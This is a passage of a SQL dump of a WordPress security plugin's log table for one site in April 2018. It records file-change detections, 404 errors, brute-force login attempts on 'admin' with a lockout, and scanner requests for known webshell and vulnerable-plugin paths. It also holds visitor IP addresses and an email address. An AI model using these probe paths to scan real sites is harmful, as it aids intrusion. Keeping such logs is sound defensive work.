4ae3f2d908365";}s:50:"wp-content/plugins/search-and-replace/inc/Load.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"d1d4fee67831c0c69aff0f7bd3f00e33";}s:52:"wp-content/plugins/search-and-replace/inc/Plugin.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"70efb6227e0239ebcadf7ad09c04f85d";}s:65:"wp-content/plugins/search-and-replace/l10n/search-and-replace.pot";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"79741a7cfb7be32cbbbf71c8392dde2d";}s:64:"wp-content/plugins/search-and-replace/inpsyde-search-replace.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"06d880476cdff3c7681782aa649fda06";}s:49:"wp-content/plugins/search-and-replace/license.txt";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"d32239bcb673463ab874e80d47fae504";}s:48:"wp-content/plugins/search-and-replace/readme.txt";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"c937beb1d3d20180c8eee266ad6c78ca";}s:77:"wp-content/plugins/better-search-replace/assets/css/better-search-replace.css";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"21db67a3c9ea82abb01216ea2c67075f";}s:69:"wp-content/plugins/better-search-replace/assets/css/jquery-ui.min.css";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"26812a28850395f8f865be4893fb20c7";}s:70:"wp-content/plugins/better-search-replace/assets/img/bsr-logo-white.svg";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"1d77dfbb1f1c0ea78523e5f2c99071c3";}s:75:"wp-content/plugins/better-search-replace/assets/js/better-search-replace.js";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"a8eed19446d6f0fa9e20ce2b4b290036";}s:79:"wp-content/plugins/better-search-replace/assets/js/better-search-replace.min.js";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"f255abc787544f1f416408c3520241c2";}s:57:"wp-content/plugins/better-search-replace/assets/index.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"03efe17b1c4a21753f7d07ee17e77395";}s:69:"wp-content/plugins/better-search-replace/includes/class-bsr-admin.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"32debefce7e9e0c35d526808313f9f46";}s:68:"wp-content/plugins/better-search-replace/includes/class-bsr-ajax.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"7dfcadac07e256b37dd36a7c3945b96c";}s:77:"wp-content/plugins/better-search-replace/includes/class-bsr-compatibility.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"70336e6f9314a8731f0740fe1126bc69";}s:66:"wp-content/plugins/better-search-replace/includes/class-bsr-db.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"ca33f8110451af7bb19225dada437ad3";}s:68:"wp-content/plugins/better-search-replace/includes/class-bsr-i18n.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"8fecf5d4b330068285f7832292fe8a69";}s:70:"wp-content/plugins/better-search-replace/includes/class-bsr-loader.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"8b2a5da7ec544da932c13d30580a1855";}s:68:"wp-content/plugins/better-search-replace/includes/class-bsr-main.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"0d0c6954aac030872189ca0e0698e721";}s:59:"wp-content/plugins/better-search-replace/includes/index.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"03efe17b1c4a21753f7d07ee17e77395";}s:76:"wp-content/plugins/better-search-replace/languages/better-search-replace.pot";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"4d3970e798768ec3a27b03e90cfd9923";}s:68:"wp-content/plugins/better-search-replace/templates/bsr-dashboard.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"bda3e0beffe006c2847aa21e3cc7e7e5";}s:63:"wp-content/plugins/better-search-replace/templates/bsr-help.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"9ec44a0dbf8e86f59a8ca765b9a621f8";}s:73:"wp-content/plugins/better-search-replace/templates/bsr-search-replace.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"871448753dc34182848d5cc0e656dba6";}s:67:"wp-content/plugins/better-search-replace/templates/bsr-settings.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"1491f1d5a54760386f91f876c3e6024b";}s:66:"wp-content/plugins/better-search-replace/better-search-replace.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"40eee52979d312dfe4592569f56ad92b";}s:50:"wp-content/plugins/better-search-replace/index.php";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"03efe17b1c4a21753f7d07ee17e77395";}s:52:"wp-content/plugins/better-search-replace/LICENSE.txt";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"4fe869ee987a340198fb0d54c55c47f1";}s:50:"wp-content/plugins/better-search-replace/README.md";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"dd4ecdde6e60d8de4bb949b4b2ffd0b3";}s:51:"wp-content/plugins/better-search-replace/README.txt";a:2:{s:1:"d";s:10:"1524010751";s:1:"h";s:32:"c7465c979257ebbc5c12b6fdf95d7ced";}}s:7:"removed";a:1:{s:107:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_int_da3dd9c2c453b9ea3d036598abfb8e7d.timthumb.txt";a:2:{s:1:"d";s:10:"1523775791";s:1:"h";s:32:"3143ce3085b9cdcd92bd4c8754ec4daa";}}s:7:"changed";a:2:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524030705";}s:82:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_cacheLastCleanTime.touch";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524030630";}}s:6:"memory";s:5:"39.25";}'),
(84888, 'four_oh_four', '404 Error', 3, '2018-04-19 17:15:47', '2018-04-19 22:15:47', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84884, 'file_change', 'File Changes Detected', 8, '2018-04-19 16:37:36', '2018-04-19 21:37:36', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:0:{}s:6:"memory";s:5:"25.42";}'),
(84885, 'four_oh_four', '404 Error', 3, '2018-04-19 17:12:29', '2018-04-19 22:12:29', '113.95.165.3', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84886, 'four_oh_four', '404 Error', 3, '2018-04-19 17:12:30', '2018-04-19 22:12:30', '113.95.165.3', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84887, 'four_oh_four', '404 Error', 3, '2018-04-19 17:15:46', '2018-04-19 22:15:46', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85038, 'four_oh_four', '404 Error', 3, '2018-04-20 16:35:32', '2018-04-20 21:35:32', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85039, 'file_change', 'File Changes Detected', 8, '2018-04-20 16:37:47', '2018-04-20 21:37:47', '', '', 0, '', '', 'a:4:{s:5:"added";a:2:{s:107:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_int_da3dd9c2c453b9ea3d036598abfb8e7d.timthumb.txt";a:2:{s:1:"d";s:10:"1524258914";s:1:"h";s:32:"3143ce3085b9cdcd92bd4c8754ec4daa";}s:90:"wp-content/uploads/ithemes-security/backups/backup-clear-your-beliefs-1524201718-RQzDp.zip";a:2:{s:1:"d";s:10:"1524219721";s:1:"h";s:32:"ee2c4d9b55ed347f18925dd08480edda";}}s:7:"removed";a:0:{}s:7:"changed";a:2:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524258914";}s:82:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_cacheLastCleanTime.touch";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1524258914";}}s:6:"memory";s:4:"39.4";}'),
(85040, 'four_oh_four', '404 Error', 3, '2018-04-20 16:53:13', '2018-04-20 21:53:13', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85041, 'four_oh_four', '404 Error', 3, '2018-04-20 17:08:55', '2018-04-20 22:08:55', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85042, 'four_oh_four', '404 Error', 3, '2018-04-20 17:20:04', '2018-04-20 22:20:04', '157.55.39.81', '', 0, '/certified-practitioners/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85043, 'four_oh_four', '404 Error', 3, '2018-04-20 17:20:05', '2018-04-20 22:20:05', '157.55.39.81', '', 0, '/certified-practitioners/4154626692/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85044, 'four_oh_four', '404 Error', 3, '2018-04-20 17:20:07', '2018-04-20 22:20:07', '157.55.39.81', '', 0, '/contacts', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85045, 'four_oh_four', '404 Error', 3, '2018-04-20 17:20:29', '2018-04-20 22:20:29', '157.55.39.81', '', 0, '/price', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85046, 'four_oh_four', '404 Error', 3, '2018-04-20 17:38:02', '2018-04-20 22:38:02', '66.70.182.52', '', 0, '/who-we-are/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85047, 'four_oh_four', '404 Error', 3, '2018-04-20 17:40:48', '2018-04-20 22:40:48', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85048, 'four_oh_four', '404 Error', 3, '2018-04-20 17:42:41', '2018-04-20 22:42:41', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85049, 'four_oh_four', '404 Error', 3, '2018-04-20 17:43:36', '2018-04-20 22:43:36', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85050, 'four_oh_four', '404 Error', 3, '2018-04-20 18:08:13', '2018-04-20 23:08:13', '193.106.30.99', '', 0, '/wp-content/plugins/thumbnail.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85051, 'four_oh_four', '404 Error', 3, '2018-04-20 18:11:48', '2018-04-20 23:11:48', '95.220.104.225', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85052, 'four_oh_four', '404 Error', 3, '2018-04-20 18:12:12', '2018-04-20 23:12:12', '188.138.105.23', '', 0, '/wp-content/plugins/wp-ps.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85053, 'four_oh_four', '404 Error', 3, '2018-04-20 18:32:36', '2018-04-20 23:32:36', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}');
INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(85054, 'four_oh_four', '404 Error', 3, '2018-04-20 18:44:36', '2018-04-20 23:44:36', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85055, 'four_oh_four', '404 Error', 3, '2018-04-20 18:55:45', '2018-04-20 23:55:45', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85056, 'four_oh_four', '404 Error', 3, '2018-04-20 18:55:46', '2018-04-20 23:55:46', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85057, 'four_oh_four', '404 Error', 3, '2018-04-20 18:55:49', '2018-04-20 23:55:49', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85058, 'four_oh_four', '404 Error', 3, '2018-04-20 18:55:50', '2018-04-20 23:55:50', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85059, 'four_oh_four', '404 Error', 3, '2018-04-20 19:20:39', '2018-04-21 00:20:39', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85060, 'four_oh_four', '404 Error', 3, '2018-04-20 19:23:05', '2018-04-21 00:23:05', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85061, 'four_oh_four', '404 Error', 3, '2018-04-20 19:33:08', '2018-04-21 00:33:08', '66.249.69.96', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85062, 'four_oh_four', '404 Error', 3, '2018-04-20 19:46:49', '2018-04-21 00:46:49', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85063, 'four_oh_four', '404 Error', 3, '2018-04-20 19:46:50', '2018-04-21 00:46:50', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85064, 'four_oh_four', '404 Error', 3, '2018-04-20 20:04:50', '2018-04-21 01:04:50', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85065, 'four_oh_four', '404 Error', 3, '2018-04-20 20:04:51', '2018-04-21 01:04:51', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85066, 'four_oh_four', '404 Error', 3, '2018-04-20 20:04:53', '2018-04-21 01:04:53', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85067, 'four_oh_four', '404 Error', 3, '2018-04-20 20:04:54', '2018-04-21 01:04:54', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85068, 'four_oh_four', '404 Error', 3, '2018-04-20 20:48:18', '2018-04-21 01:48:18', '111.206.198.87', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/wp-content/plugins/ready-ecommerce/templates/standard/subScreen.css?ver=4.8.6', 'a:1:{s:12:"query_string";s:0:"";}'),
(85069, 'four_oh_four', '404 Error', 3, '2018-04-20 21:32:10', '2018-04-21 02:32:10', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85070, 'four_oh_four', '404 Error', 3, '2018-04-20 21:32:11', '2018-04-21 02:32:11', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85071, 'four_oh_four', '404 Error', 3, '2018-04-20 21:32:13', '2018-04-21 02:32:13', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85072, 'four_oh_four', '404 Error', 3, '2018-04-20 21:32:14', '2018-04-21 02:32:14', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85073, 'four_oh_four', '404 Error', 3, '2018-04-20 21:47:05', '2018-04-21 02:47:05', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85074, 'four_oh_four', '404 Error', 3, '2018-04-20 21:47:06', '2018-04-21 02:47:06', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85075, 'four_oh_four', '404 Error', 3, '2018-04-20 21:47:09', '2018-04-21 02:47:09', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85076, 'four_oh_four', '404 Error', 3, '2018-04-20 21:47:10', '2018-04-21 02:47:10', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85077, 'four_oh_four', '404 Error', 3, '2018-04-20 22:04:05', '2018-04-21 03:04:05', '93.158.161.120', '', 0, '/blog/page/76/href', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85078, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 22:13:39', '2018-04-21 03:13:39', '185.220.101.22', 'admin', 0, '', '', 'a:0:{}'),
(85079, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 22:13:39', '2018-04-21 03:13:39', '185.220.101.22', 'admin', 0, '', '', 'a:0:{}'),
(85080, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 22:13:39', '2018-04-21 03:13:39', '185.220.101.22', 'admin', 0, '', '', 'a:0:{}'),
(85081, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 22:13:39', '2018-04-21 03:13:39', '185.220.101.22', 'admin', 0, '', '', 'a:0:{}'),
(85082, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 22:13:39', '2018-04-21 03:13:39', '185.220.101.22', 'admin', 0, '', '', 'a:0:{}'),
(85083, 'lockout', 'Host or User Lockout', 10, '2018-04-20 22:13:39', '2018-04-21 03:13:39', '185.220.101.22', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-20 22:28:39";s:11:"expires_gmt";s:19:"2018-04-21 03:28:39";s:4:"type";s:11:"brute_force";}'),
(85084, 'four_oh_four', '404 Error', 3, '2018-04-20 22:31:24', '2018-04-21 03:31:24', '216.244.66.234', '', 0, '/blog/page/72/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85085, 'four_oh_four', '404 Error', 3, '2018-04-20 23:52:29', '2018-04-21 04:52:29', '157.55.39.205', '', 0, '/wp-content/uploads/2014/03/the-clear-your-beliefs-guidebook.pdf', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85086, 'four_oh_four', '404 Error', 3, '2018-04-20 23:58:18', '2018-04-21 04:58:18', '93.158.161.85', '', 0, '/blog/page/74/zolotoslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85087, 'four_oh_four', '404 Error', 3, '2018-04-21 00:27:09', '2018-04-21 05:27:09', '193.106.30.99', '', 0, '/xmlrpc-activate.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85088, 'four_oh_four', '404 Error', 3, '2018-04-21 00:31:37', '2018-04-21 05:31:37', '193.201.224.228', '', 0, '/wp-content/themes/holding_pattern/admin/css/up_framework.css', 'http://www.clearyourbeliefs.org/wp-content/themes/holding_pattern/admin/css/up_framework.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(85089, 'four_oh_four', '404 Error', 3, '2018-04-21 00:31:55', '2018-04-21 05:31:55', '193.201.224.228', '', 0, '/wp-content/themes/holding_pattern/admin/css/up_framework.css', 'http://www.clearyourbeliefs.com/wp-content/themes/holding_pattern/admin/css/up_framework.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(85090, 'four_oh_four', '404 Error', 3, '2018-04-21 01:22:57', '2018-04-21 06:22:57', '49.204.227.93', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85091, 'four_oh_four', '404 Error', 3, '2018-04-21 02:49:17', '2018-04-21 07:49:17', '89.38.15.140', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85092, 'four_oh_four', '404 Error', 3, '2018-04-21 02:52:43', '2018-04-21 07:52:43', '100.43.85.173', '', 0, '/blog/page/73/aztek-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85093, 'four_oh_four', '404 Error', 3, '2018-04-21 02:52:46', '2018-04-21 07:52:46', '100.43.85.173', '', 0, '/blog/page/73/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85094, 'four_oh_four', '404 Error', 3, '2018-04-21 03:40:30', '2018-04-21 08:40:30', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85095, 'four_oh_four', '404 Error', 3, '2018-04-21 04:02:23', '2018-04-21 09:02:23', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85096, 'four_oh_four', '404 Error', 3, '2018-04-21 04:15:16', '2018-04-21 09:15:16', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85097, 'four_oh_four', '404 Error', 3, '2018-04-21 04:25:14', '2018-04-21 09:25:14', '61.52.67.144', '', 0, '/', '', 'a:1:{s:12:"query_string";s:8:"author=1";}'),
(85098, 'four_oh_four', '404 Error', 3, '2018-04-21 04:25:37', '2018-04-21 09:25:37', '61.52.70.242', '', 0, '/', '', 'a:1:{s:12:"query_string";s:8:"author=1";}'),
(85099, 'four_oh_four', '404 Error', 3, '2018-04-21 04:27:13', '2018-04-21 09:27:13', '195.154.28.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85100, 'four_oh_four', '404 Error', 3, '2018-04-21 04:27:25', '2018-04-21 09:27:25', '195.154.28.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85101, 'four_oh_four', '404 Error', 3, '2018-04-21 04:42:32', '2018-04-21 09:42:32', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85102, 'four_oh_four', '404 Error', 3, '2018-04-21 04:51:09', '2018-04-21 09:51:09', '94.23.217.8', '', 0, '/modules/mod_simplefileuploadv1.3/elements/udd.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85103, 'four_oh_four', '404 Error', 3, '2018-04-21 05:07:20', '2018-04-21 10:07:20', '192.227.247.209', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85104, 'four_oh_four', '404 Error', 3, '2018-04-21 05:07:20', '2018-04-21 10:07:20', '192.227.247.209', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85105, 'four_oh_four', '404 Error', 3, '2018-04-21 05:47:13', '2018-04-21 10:47:13', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85106, 'four_oh_four', '404 Error', 3, '2018-04-21 05:47:39', '2018-04-21 10:47:39', '193.106.30.99', '', 0, '/wp-content/plugins/cherry-plugin/admin/import-export/xo.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85107, 'four_oh_four', '404 Error', 3, '2018-04-21 06:01:27', '2018-04-21 11:01:27', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85108, 'four_oh_four', '404 Error', 3, '2018-04-21 06:02:38', '2018-04-21 11:02:38', '193.106.30.99', '', 0, '/global-belief-relief/wp-content/plugins/cherry-plugin/admin/import-export/xo.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85109, 'four_oh_four', '404 Error', 3, '2018-04-21 06:22:23', '2018-04-21 11:22:23', '165.231.133.109', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85110, 'four_oh_four', '404 Error', 3, '2018-04-21 06:22:24', '2018-04-21 11:22:24', '165.231.133.109', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85111, 'four_oh_four', '404 Error', 3, '2018-04-21 06:39:28', '2018-04-21 11:39:28', '157.55.39.205', '', 0, '/who-we-are/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85112, 'four_oh_four', '404 Error', 3, '2018-04-21 06:53:14', '2018-04-21 11:53:14', '103.252.200.39', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85113, 'four_oh_four', '404 Error', 3, '2018-04-21 07:52:12', '2018-04-21 12:52:12', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85114, 'four_oh_four', '404 Error', 3, '2018-04-21 08:19:17', '2018-04-21 13:19:17', '207.46.13.76', '', 0, '/global-belief-relief/robots.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85115, 'four_oh_four', '404 Error', 3, '2018-04-21 08:20:32', '2018-04-21 13:20:32', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85116, 'four_oh_four', '404 Error', 3, '2018-04-21 08:27:30', '2018-04-21 13:27:30', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85117, 'four_oh_four', '404 Error', 3, '2018-04-21 08:42:01', '2018-04-21 13:42:01', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85118, 'four_oh_four', '404 Error', 3, '2018-04-21 09:07:09', '2018-04-21 14:07:09', '196.245.232.185', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(85119, 'four_oh_four', '404 Error', 3, '2018-04-21 09:08:00', '2018-04-21 14:08:00', '193.106.30.99', '', 0, '/wp-content/plugins/custom-css-js/assets/codemirror/suspect.sys.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85120, 'four_oh_four', '404 Error', 3, '2018-04-21 09:19:40', '2018-04-21 14:19:40', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85121, 'four_oh_four', '404 Error', 3, '2018-04-21 09:19:59', '2018-04-21 14:19:59', '89.45.207.65', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85122, 'four_oh_four', '404 Error', 3, '2018-04-21 09:24:00', '2018-04-21 14:24:00', '193.106.30.99', '', 0, '/global-belief-relief/wp-content/plugins/custom-css-js/assets/codemirror/suspect.sys.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85123, 'four_oh_four', '404 Error', 3, '2018-04-21 09:28:55', '2018-04-21 14:28:55', '41.193.167.250', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/fear-of-crime-dissertation-albert-by-development/', 'a:1:{s:12:"query_string";s:0:"";}'),
(85124, 'four_oh_four', '404 Error', 3, '2018-04-21 09:39:30', '2018-04-21 14:39:30', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85125, 'four_oh_four', '404 Error', 3, '2018-04-21 09:45:08', '2018-04-21 14:45:08', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85126, 'four_oh_four', '404 Error', 3, '2018-04-21 10:17:01', '2018-04-21 15:17:01', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85127, 'four_oh_four', '404 Error', 3, '2018-04-21 10:31:23', '2018-04-21 15:31:23', '193.106.30.99', '', 0, '/global-belief-relief/wp-print.php', '', 'a:1:{s:12:"query_string";s:8:"script=1";}'),
(85128, 'four_oh_four', '404 Error', 3, '2018-04-21 10:36:03', '2018-04-21 15:36:03', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85129, 'four_oh_four', '404 Error', 3, '2018-04-21 10:36:04', '2018-04-21 15:36:04', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85130, 'four_oh_four', '404 Error', 3, '2018-04-21 10:36:06', '2018-04-21 15:36:06', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85131, 'four_oh_four', '404 Error', 3, '2018-04-21 10:36:07', '2018-04-21 15:36:07', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85132, 'four_oh_four', '404 Error', 3, '2018-04-21 11:22:54', '2018-04-21 16:22:54', '193.106.30.99', '', 0, '/wp-print.php', '', 'a:1:{s:12:"query_string";s:8:"script=1";}'),
(85133, 'four_oh_four', '404 Error', 3, '2018-04-21 11:34:22', '2018-04-21 16:34:22', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85134, 'four_oh_four', '404 Error', 3, '2018-04-21 11:54:15', '2018-04-21 16:54:15', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85135, 'four_oh_four', '404 Error', 3, '2018-04-21 12:08:10', '2018-04-21 17:08:10', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
